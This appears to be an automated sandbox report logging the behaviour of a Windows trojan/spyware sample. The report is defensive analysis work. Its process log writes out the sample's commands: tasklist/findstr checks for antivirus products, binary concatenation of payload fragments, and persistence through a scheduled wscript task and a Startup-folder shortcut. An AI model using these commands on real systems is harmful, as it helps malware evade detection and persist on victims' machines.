    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,21_2_002A1B4D
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,21_2_002AF20D
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Windows\EquationsHighlightsJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Windows\OurPropertyJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Windows\ItemAnytimeJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Windows\ExpenditureBloodJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Windows\DentalSubtleJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004074BB0_2_004074BB
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0026801721_2_00268017
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0025E14421_2_0025E144
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0024E1F021_2_0024E1F0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027A26E21_2_0027A26E
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002622A221_2_002622A2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002422AD21_2_002422AD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0025C62421_2_0025C624
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027E87F21_2_0027E87F
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002CC8A421_2_002CC8A4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B2A0521_2_002B2A05
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00276ADE21_2_00276ADE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A8BFF21_2_002A8BFF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0025CD7A21_2_0025CD7A
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0026CE1021_2_0026CE10
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027715921_2_00277159
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0024924021_2_00249240
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002D531121_2_002D5311
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002496E021_2_002496E0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0026170421_2_00261704
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00261A7621_2_00261A76
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00249B6021_2_00249B60
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00267B8B21_2_00267B8B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00261D2021_2_00261D20
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00267DBA21_2_00267DBA
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_00261FE721_2_00261FE7
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: String function: 004062A3 appears 58 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 0025FD52 appears 40 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00260DA0 appears 46 times
    Source: RailProvides_nopump.exeStatic PE information: invalid certificate
    Source: RailProvides_nopump.exe, 00000000.00000002.2044085738.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs RailProvides_nopump.exe
    Source: RailProvides_nopump.exe, 00000000.00000003.2042821091.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs RailProvides_nopump.exe
    Source: RailProvides_nopump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@40/32@3/2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B41FA GetLastError,FormatMessageW,21_2_002B41FA
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_002A2010
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002A1A0B AdjustTokenPrivileges,CloseHandle,21_2_002A1A0B
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,21_2_002ADD87
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,21_2_002B3A0E
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\MathJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile created: C:\Users\user\AppData\Local\Temp\nsyE4C.tmpJump to behavior
    Source: RailProvides_nopump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: RailProvides_nopump.exeVirustotal: Detection: 9%
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeFile read: C:\Users\user\Desktop\RailProvides_nopump.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\RailProvides_nopump.exe "C:\Users\user\Desktop\RailProvides_nopump.exe"
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ApproachesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm UJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com UJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"Jump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
